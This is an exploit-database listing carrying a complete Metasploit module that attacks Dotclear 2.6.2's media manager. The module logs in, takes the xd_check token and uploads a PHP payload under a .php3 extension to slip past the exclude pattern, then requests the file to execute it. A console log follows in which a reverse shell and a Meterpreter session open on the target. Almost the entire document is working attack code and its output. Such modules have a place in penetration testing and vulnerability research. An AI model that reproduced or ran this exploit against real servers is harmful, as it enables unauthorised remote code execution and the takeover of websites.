Dotclear Media Manager Authenticated Arbitrary File Upload



EKU-ID: 4061 CVE: OSVDB-ID:
Author: EgiX Published: 2014-05-23 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'dotclear Media Manager Authenticated Arbitrary File Upload',
      'Description'    => %q{
      The vulnerability exists because of the filemanager::isFileExclude() method not properly verifying the extension of
      uploaded files. This method just checks whether the uploaded file name matches the “exclude_pattern” regular expression,
      which by default is set to “/\.php$/i”. This could be exploited to execute arbitrary PHP code by uploading a file with
      multiple extensions or other extensions (like .php5 or .phtml) which might be handled as PHP scripts. Successful
      exploitation of this vulnerability requires an account with permissions to manage media items.
      },
      'Author'         =>
        [
          'Egidio Romano' #discovery
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'http://seclists.org/fulldisclosure/2014/May/108']
        ],
      'Payload'            =>
        {
          'Space' => 10000, # just a big enough number to fit any PHP payload
          'DisableNops' => true
        },
      'Platform'       => 'php',
      'Arch'         => ARCH_PHP,
      'Targets'        =>
        [
          [ 'dotclear 2.6.2', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 21 2014'))

    register_options([
      OptString.new('USERNAME', [true, 'The username to authenticate with', 'username']),
      OptString.new('PASSWORD', [true, 'The password to authenticate with', 'password']),
      OptString.new('TARGETURI', [true, 'The full URI path to the instance', '/']),
    ], self.class)
  end

  def check
  end

  def exploit
    post = {
      'user_id' => datastore['USERNAME'],
      'user_pwd' => datastore['PASSWORD']
    }

    print_status("Authenticating...")
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'admin', 'auth.php'),
      'method' => 'POST',
      'vars_post' => post
    })


    if !res or !res.body
      fail_with("Server did not respond in an expected way")
    end

    cookie = res.headers['Set-Cookie']

    print_status("Getting xd_check...")
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'admin', 'media.php?popup=1'),
      'cookie' => cookie
    })

    if !res or !res.body
      fail_with("Server did not respond in an expected way")
    end

    res.body =~ /name="xd_check" value="(.*)"  \/><input type="hidden" name="d"/

    xd_check = $1

    data = Rex::MIME::Message.new
    filename = Rex::Text::rand_text_alpha(8)

    data.add_part('2097152', nil, nil, 'form-data; name="MAX_FILE_SIZE"')
    data.add_part(xd_check, nil, nil, 'form-data; name="xd_check"')
    data.add_part('', nil, nil, 'form-data; name="upfiletitle"')
    data.add_part('', nil, nil, 'form-data; name="d"')
    data.add_part('<?php ' + payload.encoded + ' ?>', nil, 'text/php', 'form-data; name="upfile[]"; filename="' + filename + '.php3')

    print_status("Sending payload...")
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'admin', 'media.php?pop_up=1&post_id='),
      'method' => 'POST',
      'cookie' => cookie,
      'data' => data.to_s,
      'ctype' => 'multipart/form-data; boundary=' + data.bound
    })

    if !res or !res.body
      fail_with("Server did not respond in an expected way")
    end

    #do something with res

    print_status("Popping shell...")
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'public', filename + '.php3')
    })
  end
end

__END__
msf exploit(dotclear_file_upload) > show options

Module options (exploit/multi/http/dotclear_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   fdsafdsa         yes       The password to authenticate with
   Proxies                     no        Use a proxy chain
   RHOST      192.168.1.114    yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /dotclear        yes       The full URI path to the instance
   USERNAME   fdsa             yes       The username to authenticate with
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   dotclear 2.6.2


msf exploit(dotclear_file_upload) > exploit

[*] Started reverse handler on 192.168.1.31:4444 
[*] Authenticating...
[*] Getting xd_check...
[*] Sending payload...
[*] Popping shell...
[*] Sending stage (39848 bytes) to 192.168.1.114
[*] Meterpreter session 1 opened (192.168.1.31:4444 -> 192.168.1.114:33825) at 2014-05-21 18:39:07 -0500

meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 3.5.0-23-generic #35~precise1-Ubuntu SMP Fri Jan 25 17:15:33 UTC 2013 i686
Meterpreter : php/php
meterpreter >